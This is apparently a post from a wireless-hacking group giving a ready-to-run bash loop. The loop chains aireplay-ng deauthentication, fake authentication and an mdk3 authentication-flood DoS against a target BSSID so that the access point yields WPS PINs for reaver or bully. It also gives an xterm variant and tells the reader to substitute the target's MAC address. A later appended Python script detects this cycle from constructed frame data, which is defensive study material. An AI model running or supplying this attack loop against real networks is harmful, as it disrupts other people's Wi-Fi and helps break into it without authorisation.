From Musket Team Labs
An unresponsive network can sometimes be induced to produce WPS PINs for reaver or bully to test through the use of aireplay-ng and mdk3.
Users can test and alter the following command lines as required.
This command line embeds various aireplay-ng and mdk3 routines within a while true loop. It also uses the timeout command to terminate each process, which causes the next process to start.
The use of mdk3 is optional and sometimes counterproductive.
In the following example:
Aireplay-ng sends a series of deauth frames at the target network, then begins to conduct a fake authentication for 30 seconds. The aireplay-ng fake auth then terminates and an mdk3 DoS type "a" runs for 15 seconds. Mdk3 then terminates and the entire cycle starts again.
while true; do bssid=00:11:22:33:44:55; MON=mon0; aireplay-ng -0 10 -a $bssid $MON; killall -q aireplay-ng; sleep 2; timeout 30 aireplay-ng -1 10 -a $bssid $MON; killall -q aireplay-ng; sleep 2; timeout 15 mdk3 $MON a -i $bssid; killall -q mdk3; sleep 2; done
In bssid=00:11:22:33:44:55, substitute the MAC address of the target network for 00:11:22:33:44:55.
In MON=mon0, substitute the monitor interface you made for mon0. It could be mon0, mon1, wlan0mon, etc., as made by airmon-ng or iw commands prior to running the while true loop.
Using these two variables at the start saves you from having to change numerous entries in the long command line.
If you wish to run such processes in an xterm window, put the loop in single quotes so that $bssid and $MON are expanded inside the xterm and not by the calling shell:
xterm -g 80x10-1+350 -T "AP Activation" -e 'while true; do bssid=00:11:22:33:44:55; MON=mon0; aireplay-ng -0 10 -a $bssid $MON; killall -q aireplay-ng; sleep 2; timeout 30 aireplay-ng -1 10 -a $bssid $MON; killall -q aireplay-ng; sleep 2; timeout 15 mdk3 $MON a -i $bssid; killall -q mdk3; sleep 2; done'
Experiment with the order, times and types, especially mdk3, as you find appropriate.
Use Ctrl-C to stop the loop.
Type mdk3 --fullhelp for a more detailed outline of attack types offered.
MTeams
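
Seen from the monitoring side, the cycle described above leaves a repeating signature on one BSSID: a burst of broadcast deauth frames, then authentication frames from many different source addresses. The Python below is an added example, not part of the original post; the frame tuples, addresses, window size and thresholds are constructed assumptions standing in for whatever a wireless sensor exports.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
AP, OTHER_AP = "02:00:00:00:00:01", "02:00:00:00:00:02"  # constructed addresses

def sample_frames():
    """Constructed capture: (seconds, subtype, source, destination, bssid)."""
    frames = []
    for start in (0, 50):  # two passes of the loop
        frames += [(start + i * 0.1, "deauth", AP, BROADCAST, AP) for i in range(10)]
        frames += [(start + 3 + i * 10, "auth", "02:00:00:00:00:aa", AP, AP) for i in range(3)]
        frames += [(start + 35 + i * 0.075, "auth", "02:00:00:00:%02x:%02x" % (start, i), AP, AP)
                   for i in range(200)]
    # ordinary clients joining an unrelated AP
    frames += [(20.0 * i, "auth", "02:00:00:00:01:%02x" % i, OTHER_AP, OTHER_AP) for i in range(4)]
    return sorted(frames)

def detect(frames, window=5, deauth_limit=5, auth_src_limit=20):
    """Return sorted (window_start, bssid, kind) alerts; thresholds are assumptions."""
    deauths = defaultdict(int)
    auth_srcs = defaultdict(set)
    for ts, subtype, src, dst, bssid in frames:
        bucket = int(ts // window) * window
        if subtype == "deauth" and dst == BROADCAST:
            deauths[(bucket, bssid)] += 1
        elif subtype == "auth" and dst == bssid:
            auth_srcs[(bucket, bssid)].add(src)  # count distinct senders, not frames
    alerts = [(b, ap, "deauth-burst") for (b, ap), n in deauths.items() if n >= deauth_limit]
    alerts += [(b, ap, "auth-flood") for (b, ap), s in auth_srcs.items()
               if len(s) >= auth_src_limit]
    return sorted(alerts)

def cycling_bssids(alerts, window=5, min_repeats=2):
    """BSSIDs where both alert kinds recur, which points at a scripted loop."""
    seen = set(alerts)
    episodes = defaultdict(lambda: defaultdict(int))
    for bucket, ap, kind in alerts:
        if (bucket - window, ap, kind) not in seen:  # count a run of windows once
            episodes[ap][kind] += 1
    return sorted(ap for ap, k in episodes.items()
                  if k["deauth-burst"] >= min_repeats and k["auth-flood"] >= min_repeats)

if __name__ == "__main__":
    found = detect(sample_frames())
    for alert in found:
        print(alert)
    print("repeating cycle on:", cycling_bssids(found))
```

A single station retrying authentication, as the fake auth phase does, stays under the distinct-sender threshold, so the deauth bursts and the flood phase are what raise the alerts here.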